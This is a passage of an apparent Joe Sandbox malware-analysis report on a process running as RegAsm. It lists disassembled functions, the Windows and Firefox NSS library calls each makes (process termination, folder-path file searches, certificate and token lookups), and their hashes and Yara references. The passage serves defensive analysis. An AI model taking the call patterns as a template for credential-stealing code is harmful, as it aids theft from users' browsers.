Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID:
API String ID: 3986731826-0
Opcode ID: 45d8b0a3e06c6b8e57e28817488b6d1283472b9a3745b94def42b2ba530f12f2
Instruction ID: e2eb70bbcc0f6e5bbf3fa2d487c554d00f7acc12f15ac10c028eaf00b0bfd7e5
Opcode Fuzzy Hash: 45d8b0a3e06c6b8e57e28817488b6d1283472b9a3745b94def42b2ba530f12f2
Instruction Fuzzy Hash: FD413871900209DFCF15DF69C880ADEBBF9FF48710F14426AE854EA266D3749985CFA4

Function 0041BCD9 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041BD1E
_memmove.LIBCMT ref: 0041BD32
_memmove.LIBCMT ref: 0041BD7F
WriteFile.KERNEL32(00000000,?,66ED032A,?,00000000,01302528,?,00000001,01302528,?,0041ADC4,?,00000001,01302528,66ED032A,?), ref: 0041BD9E

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memmove$FileWritemalloc
String ID:
API String ID: 803809635-0
Opcode ID: 573fb257bfd3c68c09ed02e86126dadf861773a432a6753814ceafe505970c71
Instruction ID: 9cf1f006437c34178a4ec1c2a30f08b28d4ba40315e5c795aae280bd07f5d96a
Opcode Fuzzy Hash: 573fb257bfd3c68c09ed02e86126dadf861773a432a6753814ceafe505970c71
Instruction Fuzzy Hash: 10318171600704AFDB64CF55EA80BA7B7F8FB48310F50852FE98687A40DB74F9448BA8

Function 004122B0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004122D7

Part of subcall function 00411D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
Part of subcall function 00411D61: HeapAlloc.KERNEL32(00000000), ref: 00411D73
Part of subcall function 00411D61: wsprintfW.USER32 ref: 00411D84

OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
CloseHandle.KERNEL32(00000000), ref: 00412392

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
String ID:
API String ID: 2224742867-0
Opcode ID: 5fa75da28a9b3be2df586e6f95abbe7c7d30b06aac8bdea7de0b139f9962097e
Instruction ID: d3f84c1a77783b19079c5f321e17186e9b27461e23e9a35ab57a57faa0f51dba
Opcode Fuzzy Hash: 5fa75da28a9b3be2df586e6f95abbe7c7d30b06aac8bdea7de0b139f9962097e
Instruction Fuzzy Hash: 84314F72A0121CABDB209F61DD859EE77BDEF0A345F0400A6F909E2550D6785F84CF56

Function 6C1B8530 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,6C1B72EC), ref: 6C1B855A

Part of subcall function 6C1B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C158298,?,?,?,6C14FCE5,?), ref: 6C1B07BF
Part of subcall function 6C1B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C1B07E6
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B081B
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B0825

PORT_ArenaGrow_Util.NSS3(?,00000000,?,00000001,?,?,6C1B72EC), ref: 6C1B859E
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C1B72EC), ref: 6C1B85B8
PR_SetError.NSS3(FFFFE005,00000000,?,6C1B72EC), ref: 6C1B8600

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ErrorUtil$ArenaHashLookupTable$Alloc_ConstFindGrow_
String ID:
API String ID: 1727503455-0
Opcode ID: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
Instruction ID: bbeb06a26d29410216bc6c766ba4da4fb0ba22cee445c8ff858db8beb0e0bbd3
Opcode Fuzzy Hash: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
Instruction Fuzzy Hash: 5C21F472A002139BF7009F2DDE40B6B76A9AF9171CF65413AD865E7750EB31D8068FA1

Function 6C156420 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C155DEF,?,?,?), ref: 6C156456
CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C155DEF,?,?,?), ref: 6C156476
CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C155DEF,?,?,?), ref: 6C1564A0
PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C155DEF,?,?,?), ref: 6C1564C2

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CertificateError$DestroyTemp
String ID:
API String ID: 3886907618-0
Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction ID: b9431a02d9b5b1498ab4580ae7f509cfc305bde083fbc458cf9552dab699173c
Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction Fuzzy Hash: A521E7F1A00205ABEB209F28DC05B6776E9EB50308F944538F539C6B51E7B2D968C7D1

Function 6C1A4590 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000008,?,6C1A473B,00000000,?,6C197A4F,?), ref: 6C1A459B

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

TlsGetValue.KERNEL32(?,?,6C1A473B,00000000,?,6C197A4F,?), ref: 6C1A45BF
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C1A473B,00000000,?,6C197A4F,?), ref: 6C1A45D3
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C1A473B,00000000,?,6C197A4F,?), ref: 6C1A45E8

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$Alloc_CriticalEnterSectionUnlockUtilmalloc
String ID:
API String ID: 2963671366-0
Opcode ID: 7f1d633dbaded94cf43eb585239aaa55d6bbd50096ec67c320dd5b689bc68beb
Instruction ID: 80d00392cf263859b1ac7180a8c948cc06f8040bba69b07a27c5072eb607922d
Opcode Fuzzy Hash: 7f1d633dbaded94cf43eb585239aaa55d6bbd50096ec67c320dd5b689bc68beb
Instruction Fuzzy Hash: D721D3B4E00206ABDB009FA9DC086AABBB4FF49319F004535DC5CD7B51EB31E556CB91

Function 004165B8 Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 00416600
lstrcatA.KERNEL32(?,00436B40), ref: 0041661D
lstrcatA.KERNEL32(?), ref: 00416630
lstrcatA.KERNEL32(?,00436B44), ref: 00416642

Part of subcall function 00415F2A: wsprintfA.USER32 ref: 00415F71
Part of subcall function 00415F2A: FindFirstFileA.KERNEL32(?,?), ref: 00415F88
Part of subcall function 00415F2A: StrCmpCA.SHLWAPI(?,00436AA8), ref: 00415FA9
Part of subcall function 00415F2A: StrCmpCA.SHLWAPI(?,00436AAC), ref: 00415FC3
Part of subcall function 00415F2A: wsprintfA.USER32 ref: 00415FEA
Part of subcall function 00415F2A: StrCmpCA.SHLWAPI(?,00436647), ref: 00415FFE
Part of subcall function 00415F2A: wsprintfA.USER32 ref: 0041601B
Part of subcall function 00415F2A: PathMatchSpecA.SHLWAPI(?,?), ref: 00416048
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?), ref: 0041607E
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?,00436AC4), ref: 00416090
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?,?), ref: 004160A3
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?,00436AC8), ref: 004160B5
Part of subcall function 00415F2A: lstrcatA.KERNEL32(?,?), ref: 004160C9

Part of subcall function 00415F2A: wsprintfA.USER32 ref: 00416032
Part of subcall function 00415F2A: FindNextFileA.KERNEL32(?,?), ref: 00416258
Part of subcall function 00415F2A: FindClose.KERNEL32(?), ref: 0041626C

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID:
API String ID: 153043497-0
Opcode ID: 3a68cf72d1348591e44153d22ebda9aac3037babc57feb7a9b41b2e6796ccedf
Instruction ID: a19dc982af3eb9139cccb27391f8c24d51490f159ca90d5b2473ba404c2e4f1a
Opcode Fuzzy Hash: 3a68cf72d1348591e44153d22ebda9aac3037babc57feb7a9b41b2e6796ccedf
Instruction Fuzzy Hash: 3D21A77590021DAFCB60DF61DC46ADDB779EB18305F0050A6B985E3190DFB49AC5CF45

Function 6C1404D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 6C1404F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C14053B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C140558
GetLastError.KERNEL32 ref: 6C14057A

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
String ID:
API String ID: 3051374878-0
Opcode ID: 3bf63b294fd3cf2a56abde78e6c89654bdf058b0ad43f767a3d067d5d2734878
Instruction ID: fd2aead62c8496ef16324cb652ba95f9bf99f539cfe46744e4f168fe88a0ce1b
Opcode Fuzzy Hash: 3bf63b294fd3cf2a56abde78e6c89654bdf058b0ad43f767a3d067d5d2734878
Instruction Fuzzy Hash: 0E215071A002189FDB04DFA9DC98AAEB7F8FF48314B108069E809DB351DB35ED05CB90

Function 6C1C2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C1C2E08

Part of subcall function 6C1B14C0: TlsGetValue.KERNEL32 ref: 6C1B14E0
Part of subcall function 6C1B14C0: EnterCriticalSection.KERNEL32 ref: 6C1B14F5
Part of subcall function 6C1B14C0: PR_Unlock.NSS3 ref: 6C1B150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C1C2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C1C2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C1C2E95

Part of subcall function 6C1B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C1588A4,00000000,00000000), ref: 6C1B1228
Part of subcall function 6C1B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C1B1238
Part of subcall function 6C1B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C1588A4,00000000,00000000), ref: 6C1B124B
Part of subcall function 6C1B1200: PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0,00000000,00000000,00000000,?,6C1588A4,00000000,00000000), ref: 6C1B125D
Part of subcall function 6C1B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C1B126F
Part of subcall function 6C1B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C1B1280
Part of subcall function 6C1B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C1B128E
Part of subcall function 6C1B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C1B129A
Part of subcall function 6C1B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C1B12A1

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: d80a052276e07c85f112f5c3c79d4975810684126a6ae1f9709d5165013e90e8
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: C821D4B1F003454BE700CF549D44BAA3764AFB170CF221269ED087B742F7B9E69886A2

Function 6C17ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C17ACC2

Part of subcall function 6C152F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C152F0A
Part of subcall function 6C152F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C152F1D

Part of subcall function 6C152AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C150A1B,00000000), ref: 6C152AF0
Part of subcall function 6C152AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C152B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C17AD5E

Part of subcall function 6C1957D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C15B41E,00000000,00000000,?,00000000,?,6C15B41E,00000000,00000000,00000001,?), ref: 6C1957E0
Part of subcall function 6C1957D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C195843

CERT_DestroyCertList.NSS3(?), ref: 6C17AD36

Part of subcall function 6C152F50: CERT_DestroyCertificate.NSS3(?), ref: 6C152F65
Part of subcall function 6C152F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C152F83

free.MOZGLUE(?), ref: 6C17AD4F

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 1d9b28647a3e680dcee9da70ef056080addb93c8faab78e5c8624dd30e1bb1af
Instruction ID: e884bfcb6e8baba41176f2bb3053c18f9e64de02d59704466f70b66038ecff31
Opcode Fuzzy Hash: 1d9b28647a3e680dcee9da70ef056080addb93c8faab78e5c8624dd30e1bb1af
Instruction Fuzzy Hash: 3821C6B2D002048BEB20DFA4D9096EE77B4AF15248F455069DC1577701FB31EA59CBB1

Function 6C1924E0 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C1924FF
EnterCriticalSection.KERNEL32(?), ref: 6C19250F
PR_Unlock.NSS3(?), ref: 6C19253C
PR_SetError.NSS3(00000000,00000000), ref: 6C192554

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: dc8c335dbb26368229b7e3b4e6eb525a48896e61fd3c655967b646af05bcb0ad
Instruction ID: 6d354d0574ed68d365cfee9bdf17db7e2f262d46450580efc4ad61b575341a03
Opcode Fuzzy Hash: dc8c335dbb26368229b7e3b4e6eb525a48896e61fd3c655967b646af05bcb0ad
Instruction Fuzzy Hash: EE110871E00108AFEB00AF68EC49ABF7BB8EF09328B454164ED0897341EB31E955C7E1

Function 6C1AECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C1AF0AD,6C1AF150,?,6C1AF150,?,?,?), ref: 6C1AECBA

Part of subcall function 6C1B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1587ED,00000800,6C14EF74,00000000), ref: 6C1B1000
Part of subcall function 6C1B0FF0: PR_NewLock.NSS3(?,00000800,6C14EF74,00000000), ref: 6C1B1016
Part of subcall function 6C1B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C1587ED,00000008,?,00000800,6C14EF74,00000000), ref: 6C1B102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C1AECD1

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C1AED02

Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C1AED5A

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 0cfdadb512a2a5bf1d551f20bfcd1769fbbdfcf071b9d3793b065159997badc3
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: FF21A4B5A007425BE700CF25D944B52B7E4BFA4348F25C219E81C97661F770E6A5CAD0

Function 6C1DEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C1C7FFA,?,6C1C9767,?,8B7874C0,0000A48E), ref: 6C1DEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C1C7FFA,?,6C1C9767,?,8B7874C0,0000A48E), ref: 6C1DEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C1C7FFA,?,6C1C9767,?,8B7874C0,0000A48E), ref: 6C1DEE14

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

memcpy.VCRUNTIME140(?,?,6C1C9767,00000000,00000000,6C1C7FFA,?,6C1C9767,?,8B7874C0,0000A48E), ref: 6C1DEE33

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
